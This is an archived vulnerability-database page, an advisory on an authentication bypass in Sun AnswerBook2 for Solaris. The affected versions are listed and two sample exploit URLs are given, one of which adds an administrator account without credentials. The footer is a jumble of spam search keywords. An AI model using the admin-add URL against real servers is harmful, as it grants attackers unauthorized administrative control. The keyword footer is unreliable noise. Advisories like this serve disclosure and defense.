about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Sun AnswerBook2 Unauthorized Administrative Script Access Vulnerability


Title Sun AnswerBook2 Unauthorized Administrative Script Access Vulnerability
Published 2002-08-02-12:00AM
Updated 2002-08-02-05:23AM
Class Access Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Reported by ghandi <ghandi@mindless.com>.
Vulnerable  Sun AnswerBook2 1.4.2
Sun Solaris 2.3
Sun Solaris 2.4
Sun Solaris 2.4 _x86
Sun Solaris 2.5
Sun Solaris 2.5 _x86
Sun Solaris 2.5.1
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1 _x86
Sun Solaris 2.6
Sun Solaris 2.6 _x86
Sun Solaris 7.0
Sun Solaris 7.0 _x86
Sun Solaris 8.0
Sun Solaris 8.0 _x86
Sun AnswerBook2 1.4.1
Sun Solaris 2.3
Sun Solaris 2.4
Sun Solaris 2.4 _x86
Sun Solaris 2.5
Sun Solaris 2.5 _x86
Sun Solaris 2.5.1
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1 _x86
Sun Solaris 2.6
Sun Solaris 2.6 _x86
Sun Solaris 7.0
Sun Solaris 7.0 _x86
Sun Solaris 8.0
Sun Solaris 8.0 _x86
Sun AnswerBook2 1.4
Sun Solaris 2.3
Sun Solaris 2.4
Sun Solaris 2.4 _x86
Sun Solaris 2.5
Sun Solaris 2.5 _x86
Sun Solaris 2.5.1
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1 _x86
Sun Solaris 2.6
Sun Solaris 2.6 _x86
Sun Solaris 7.0
Sun Solaris 7.0 _x86
Sun Solaris 8.0
Sun Solaris 8.0 _x86
Sun AnswerBook2 1.3
Sun Solaris 2.3
Sun Solaris 2.4
Sun Solaris 2.4 _x86
Sun Solaris 2.5
Sun Solaris 2.5 _x86
Sun Solaris 2.5.1
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1 _x86
Sun Solaris 2.6
Sun Solaris 2.6 _x86
Sun Solaris 7.0
Sun Solaris 7.0 _x86
Sun Solaris 8.0
Sun Solaris 8.0 _x86
Sun AnswerBook2 1.2
Not Vulnerable  
Code   This vulnerability may be exploited with a web browser. The following sample URLs have been submitted:

http://localhost:8888/ab2/@AdminViewError

http://localhost:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 19:32:50 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
boolywood www.92meit gift.com apache 2.0 DSL-G624T bigbrest.c WWW.SXE.CO abirami ho com_phpsho m...6id.tx Sexyvideo 200 /compo news for C hotasses vbulletin Lesbean se http:// fr ipcop boolywood Crack Data %2B%2Bsexf BisonFTP B HP JetDire news for c appserver www.picsex browsers%2 Anna sexi free xxxin kabel koffi daily indi Form hao566.cn celebrity www.blog-m jooma Crack Data news for c www.kingaw 0.93 Crack Data www.top-po nayan thar  WWW.SEXYWO Crack 20 maxcpm.inf SEX VIDEOS Sexwallpap